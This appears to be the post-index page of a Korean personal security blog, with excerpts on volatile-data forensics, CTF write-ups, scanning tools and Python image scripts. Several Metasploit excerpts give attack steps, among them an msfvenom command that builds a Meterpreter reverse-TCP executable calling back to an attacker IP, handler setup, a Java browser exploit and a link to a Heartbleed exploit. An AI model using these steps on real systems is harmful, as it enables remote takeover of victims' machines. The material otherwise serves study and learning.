Lucete284

• 

  휘발성 데이터 수집 2탄이옵시다. 2탄이옵시다.!!! 1탄을 쓰고 2탄을 바로 포스팅을 할려고 했는데 ... 출장과 일이 좀많아서 이제 씁니다... 바로 본론으로 들어가 봅시다.! 1탄에서 네트워크 정보수집까지 적은 것으로 기억을 하는데 맞습니까?(혼자 북치고 장구치기) 네~~~~~~~~~~~~ 다음을 계속 이어 적어 봅시다.!!!프로세스 목록을 수집해볼것이다.보는 것과 같이 mac에서는 'ps -ef' 라는 명령어를 주게 되면 프로세스 목록을 수집할 수 있게 된다. 옵션의 ef에서 'f'는 full format listing의 약자이며 'e'는 every의 약자로 현재 실행중인 모든 프로세스를 출력하라는 의미이다.windows에서는 tasklist를 하게 되면 보는 것처럼 pid와 세션이름 등을 나타내준다.옵션을 알고 싶다면 taskl.. For3nsic/Forensic 2018. 12. 10.

• 

  휘발성 데이터 수집 하기 어제 쓴글을 확인해보면 http://blog.z3alous.xyz/226 인가된 도구를 사용하고 특화된 도구만을 사용하도록 한다. - 로카르의 교환법칙 => '접촉이 있는 두 물체 사이에는 반듯이 교환이 일어난다' => 물체와의 접촉이 생기고 한다면 증거가 될수 있다라는 의미로 범죄자에게만 적용되는 것이아니라 수사관에도 적용된다. 첫번째 내용이 시스템에 영향이 최대한 안가게 작업한다.두번째는 로카르의 교환법칙쉽게말해 무작정 하지말고 조심스럽게 생각해서 수집하라는 말이다. 케케케케케케케케생각해서라 ... 그럼 다시한번 이사진이 필요하다고 생각한다. For3nsic/Forensic 2018. 12. 3.

• 

  휘발성 데이터 수집, 라이브 리스폰스 요즘 뭔가 블로그를 적어야 할 것만 같은 기분이 든다... 저번에는 사고대응 등에 대해 포스팅을 했다. 오늘은 휘발성 데이터 수집에 관련하여 내용을 적어볼 것이다.휘발성 데이터는 말그대로 날아가는 데이터이다. 즉, 쉽게 말해 하드디스크에 저장되는 데이터 말고 메모리에 올라가 있거나 컴퓨터를 종료하면 없어지는 데이터들을 말하는 것이다.휘발성 데이터 같은 경우에는 앞에서 말한 것처럼 컴퓨터를 종료하게 되면 사라지기 때문에 컴퓨터를 종료하지 않은 상태(실행되고 있는 상태)에서 진행을 한다.(경우에 따라 다름) - 라이브 리스폰스(live response) 그럼 휘발성 데이터에는 어떤것들이 포함이 되어있는 것일까? - 시간, 날짜 정보 - 네트워크 정보 - 사용자 정보 - 프로세스 정보 - 핸들 목록 - 서비스.. For3nsic/Forensic 2018. 12. 1.

• 

  디지털 포렌식의 사고대응 및 증거처리 짜쟌~!! 디지털 포렌식에 있어서 침해 당했거나 사고가 일어나면 증거를 수집하고 처리하는 것에 대해 알아보자 :D 사고가 일어나 사고 대응 절차를 보게 되면 크게 6개로 나누어진다.1. 준비 - 준비가 되어있으면 어떠한 사고가 발생했을 시 신속하게 대응 할수 있다. 준비는 사고 대응 계획을 수립하는 단계를 이야기한다. - 프로세스, 절차, 조사에 필요한 도구 등이 모두 포함되며 물론 조사에 필요한 도구 사용법 또한 포함된다.2. 탐지 - 생각을 해보자 기본적으로 많은 관제회사 뿐아니라 여러곳에서 관제를 하지만 공격은 계속들어오고 사건 사고는 계속 발생한다. 여기서 탐지 능력은 이많은 것들 중 중요한 것을 골라 어떠한 공격(사건)으로 연결되는지를 판단하는 능력인 것 같다.3. 분석 - 이 때부터 본격적으로.. For3nsic/Forensic 2018. 11. 29.

• 

  hackover CTF I AM MANY write up :) 두두두둥 오랜만에 작성하는 Write UP !!! 호호호호호호우 먼저 문제 파일을 받아보면 !!! 이사진이다. 흠... 흐으므므므믐흐읗으흥흥흐읗읗ㅇ흐읗으ㅡㅇ 자 먼저 그냥 binwalk로 확인을 해보자!!! PNG가 2개가 있는 것이 확인되었다.그럼 각나왔다. 바로 010 editor로 간다. 이러한 값들이 나오는 것을 확인할 수 있다.png 헤더 시그니처는 89 50 4E 47 0D 0A 1A 0A 이며 IEND는 PNG의 마지막을 나타내는 것이다.그럼 찾아보자 PNG가 두개가 있는 것을 확인할 수 있다. 이렇게 말이다. 그럼 여기에 있는 PNG를 두개를 따로 저장을 하게 되면 이렇게 나오는 것을 확인할 수 있다.!!! 흐흐흐흐흐흐흫 다음엔 다른문제로 나타나겠습니다.!!!! 넝~~~!!!~~~담~~~~~ Wargame/CTF(Capture The Flag) 2018. 10. 9.

• 

  고정 소수점 오랜만에 포스팅을 합니다. 군인인지라 Security Study/Base Of Computer 2018. 9. 26.

• 

  홀리쉴드 2016? forensic memory :) 어쩌다 보니 찾게 된문제!!! 풀어보자 !! 근데 맞게 푸는지를 모르겠다 :( 문제는 Auth : MalwarePid_C&C_Attacker.Serverex) 123_http://www.naver.com/index.php_1.2.3.4 Hint) No ParameterHint-2) Attacker.Server on the MemoryHint-3) Attacker.Server is pharming Server 이렇게 란다.시작하자 !! 크와아아앙 나와라 ! volatility!!!! 먼저 imageinfo 를 통해 profile과 메모리 덤프파일 생성 시간을 확인 후 pslist명령어를 통해 프로세스 리스트를 확인 해보았다. 보다보니 attrib.exe를 보고 무슨 파일인지 의문 이생겼다.바로 구글로 달려.. Wargame/CTF(Capture The Flag) 2017. 1. 11.

• 

  어디 문제인지 까묵은 문제... 일단 파일있어 풀어본당... 이파일이다.스테가노그래피 문제 같다. 그래서 이번에 사용할 툴은 stegosolve 라는 것이다.구글에 stegosolve를 검색하면 다운받을 수있는 곳이 나온다. 실행을 하면 이러한 창이 나온다! stegosolve를 실행 시키려면 java가 꼭필요하다. 이제 file - open 해보자이렇게 열고 나서 화살표를 눌러보오자!! :) 계속누르다 보면 글자가 보인다.위 사진은 blue plane 5 지만 Gray Bit 까지 넘기면요로코롬 :) 짠!! Wargame/CTF(Capture The Flag) 2017. 1. 11.

• 

  메모리 포렌식에서 volatility 를 사용하면서 ... :) 메모리 포렌식에 빠져서 요즘 공부하다가 volatility를 사용하는 도중 의문이 들었다. 의문이라기 보단 잘 보지 않아 생긴 문제이지만 ... 먼저 imageinfo 를 하여 메모리덤프의 프로파일을 확인 할수있다...여기서 의문이 들었는데 ........ 두둥 !!! BoB.vmem 파일의 프로파일은 windows XPSP2x86과 XPSP3x86 2개가 나온다... 물론 아는 사람도 있다. 어떻게 서비스팩을 찾아내는지... 눈이있다면 안다... 난 눈이없었다.그래서 명령어를 통해서 알아 봤다. 어떻게? dlllist | grep xpsp2 For3nsic/The Art of Memory Forensic 2017. 1. 10.

• 

  Brutal – Toolkit to quickly create various payloads,powershell and virus attacks Brutal – Toolkit to quickly create various payloads,powershell and virus attacksBrutal - 빠르고 다양한 payloads, 파워셸과 바이러스 공격을 위한 툴킷 https://github.com/screetsec/brutal Metasploit 2016. 12. 28.

• 

  해킹하는 척 하기!!! 매일 공부이야기 말고 오늘은 남들앞에서 조금 있어 보이고 장난치는 해킹하는 척 하기를 해봅시다.!!! :) 먼저 http://www.hackertyper.com 을 접속해줍니다.이러한 화면이 뜨는 것을 알수 있다. 여기서 f11을 누르면 전체화면으로 바뀐다. :) 그리고 아무키나 막누르면 이렇게 글씨가 써지는 것을 볼수 있다. My Story 2016. 12. 28.

• 

  owasp zap tutorial :) owasp zap 은 owasp에서 오픈소스로 공개한 툴이다. 그럼 무엇을 하는 툴인가? 홈페이지나 서버를 본인 스스로 체크하고 점검해주는 오픈 소스이다. burp랑 비슷하지만 오픈소스라는 점에서 차이점이 있다. 그럼 owasp는 무엇인가 ? The Open Web Application Security Project 로 전 세계적으로 보안 전문가들이 보안 취약점 진단 기준과 표준을 수립하고, 웹 어플리케이션 보안 관련 문서를 배포하고 보안 취약점 관련 툴을 개발하는 오픈소스 커뮤니티이다. 공식 홈페이지는 https://www.owasp.org/index.php/Main_Page 여기이다. owasp zap의 사이트는 https://www.owasp.org/index.php/OWASP_Zed_Attack_.. Security Study/Web 2016. 12. 27.

• 

  netdiscover tutorial :) netdiscover 같은 경우에는 기본적으로 backtrack 5 나 kali 에 있는 network tool이다. netdiscover은 active / passive scanner이다. 사용방법을 한번 알아보자 . 기본적으로 netdiscover 만 입력해도 이렇게 뜨는 것을 알수있다. 좀더 구체적으로 사용하기위해 netdiscover -h 를 입력하면 도움말이나오는데 -r 옵션을 이용하여 대역대를 설정해줄수도 있다. Security Study/Network 2016. 12. 26.

• Changes in Python 3.6 1. f string formatting (PEP 498) You can avoid the inconvenience of having to kill variables when using the .format () method or%. >>> lang = 'Python' >>> author = 'Guido van Rossum' >>> 'Language: {}, Author: {}'.format(lang, author) Language: Python, Author: Guido van Rossum >>> f'Language: {lang}, Author: {author}' Language: Python, Author: Guido van Rossum 2. Type hint (PEP 484) In 3.5, type.. Language 2016. 12. 24.

• 

  Hack windows XP with armitage in kali 모든 책임은 사용자 본인에게 있습니다. 먼저 service apache2 start 를 실행해준다. 다음은 service postgresql start 명령어를 실행시킨 후 service metasploit start 를 실행해준다. 다음은 armitage를 실행시킨다. 이러한 창을 볼수있을 텐데 connect를 누르고 yes를 누르고 기다리면 음~~ 음~~~ 기다리면 이러한 창이 뜬다. tab창에서 hosts -> add hosts 를 누르면 이렇게 victim IP를 입력할 수있도록 뜬다. 등록후 OS 를 알아보자 다시 host 탭에서 nmap scan -> quick scan(os detect)를 클릭하고 yes 그럼 콘솔창에 이러한 것을 확인할수 있다. 이제 취약점을 이용하여 공격하기 위해 어떠한.. Metasploit 2016. 12. 23.

• 

  how to change hostname (hostname 바꾸기 ) hostname이란? 연결된 장치의 이름을 말한다. 여기서 보면 parrotsec이란 것이 hostname 이다. hostname이란 명령어를 이용하여 일시적으로 변경이 가능하지만 /etc/hostname에서 변경을 하여 바꿀 수 있다. 두둥 :) Security Study/Server(Linux) 2016. 12. 23.

• 

  Kali Linux by pass - Hack Windows metasploit tutorial 모든 책임은 사용자 본인에게 있습니다. 먼저 service apache2 startservice postgresql startservice metasploit startmsfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker ip] LPORT=[원하는 포트] -f exe > filename.exe 그럼 /root 폴더에 exe파일이 생긴것을 확인할수 있다.그럼 다음으로는 컨트롤할 핸들러를 만들어보자. 먼저 msfconsole을 입력한다. use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp [우리가 파일을 만들때 사용한 payload]set LHOST [attacker ip]set LP.. Metasploit 2016. 12. 22.

• base 64 원하는 횟수만큼 decoding 하기 python (파일 넣어서) # -*- coding:utf-8 -*- import base64 f = open("")#파일 명 (경로) Buff = f.readlines() Buff = str(Buff) for x in range(0, 50): #50자리에 반복하고 싶은 횟수 Buff = base64.decodestring(Buff) print Buff Language 2016. 12. 22.

• 

  Hack windows with metasploit Java Applet JMX Remote Code Execution 모든 책임은 사용자에게 있습니다. 연구 목적으로만 사용하시기 바랍니다. 먼저 하기전에 리눅스에서 service apache2 startservice postgresql startservice metastploit start 명령어들을 실행 시켜준다. 그 후 msfconsole을 해준다. 그럼 위와같은 창이 뜰것이다. (그림은 다를 수 있다.) 그 후 우리가 해야할 일은 핸들러를 만드는 일이다.use exploit/multi/browser/java_jre17_jmxbean_2 명령어를 이용하여 핸들러를 만든다. 우리가 다음 해야 할 행동으로 show options 을 이용하여 우리가 정해줘야하는 것을 본다. 먼저 URIPATH 명령어를 이용하여 경로를 지정해준다. / 해도되고 test를 해도된다. 지정하지.. Metasploit 2016. 12. 22.

• 

  web server 취약점 스캐너 nikto :) 웹 서버 취약점 점검 툴인 nikto에 대해 알아보자 :) 공식 홈페이지는 https://cirt.net/Nikto2 이다 . 여기서 다운을 받을 수있고 설치를 할수 있다. 리눅스 같은경우 apt-get install nikto 와 yum install nikto 로 쉽게 받을 수있다. Mac OS같은 경우에는 brew install nikto 를 하면 쉽게 받을수있다 . 먼저 명령어를 보자 간단하게 터미널에서 nikto 만 치게 되면 도움말들이 나타나는 것을 알 수있다. 조금 더 자세히 알고 싶다면 nikto -Help 를 입력한다면 이렇게 많은 도움말을 볼수가 있다. nikto 의 사용법을 알아보면 nikto -h [HOST IP] 이렇게만 해도된다. 왜냐 기본적으로 포트는 80번이 디폴트 값을 지니.. Security Study/Web 2016. 12. 21.

• individual bands of image.py from PIL import Imageimport numpy as np im = Image.open('heartbleed.png') # In this case, it's a 3-band (red, green, blue) image# so we'll unpack the bands into 3 separate 2D arrays.r, g, b = np.array(im).T # Let's make an alpha (transparency) band based on where blue is < 100a = np.zeros_like(b)a[b Language 2016. 12. 21.

• RGB image analysis.py import numpy as npimport mpl_toolkits.mplot3d.axes3d as p3import matplotlib.pyplot as pltimport colorsysfrom PIL import Image # (1) Import the file to be analyzed!img_file = Image.open("sunset.jpg")img = img_file.load() # (2) Get image width & height in pixels[xs, ys] = img_file.sizemax_intensity = 100hues = {} # (3) Examine each pixel in the image filefor x in xrange(0, xs): for y in xrange(0, .. Language 2016. 12. 21.

• 

  image GPS.py from PIL import Imagefrom PIL.ExifTags import TAGS filename = "sunset.jpg"extension = filename.split('.')[-1]if (extension == 'jpg') | (extension == 'JPG') | (extension == 'jpeg') | (extension == 'JPEG') | (extension == 'PNG') |(extension == 'png'): try: img = Image.open(filename) info = img._getexif() exif = {} for tag, value in info.items(): decoded = TAGS.get(tag, tag) exif[decoded] = value #.. Language 2016. 12. 21.

• 

  base image.py from PIL import Image img = Image.open("filename.jpg")print(img.size)print(img.format) img.show() Language 2016. 12. 21.

• 

  Heartbleed :) 하트블리드 heartbleed 는 2015년 보안 취약점 중 대표적인 취약점이라 할수 있다. heartbleed 취약점은 공격자가 서버의 메모리의 일부분을 읽어 올 수 있는 openSSL의 취약점으로 요청할때 요청할 단어가 만약 aaa이면 3바이트를 요청하면 되는데 이 보다 더 큰 바이트인 500을 하게 된다면 aaa를 반환하고 남은 메모리를 다른 값으로 뱉어 주는 취약점을 말한다. 취약점을 실습해볼 때에는 1. https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/heartbleed.c여기서 다운을 받은 후 2. gcc heartbleed.c -o heartbleed -Wl,-Bstatic -ssl -Wl,-Bdynamic -lssl3 .. Metasploit 2016. 12. 21.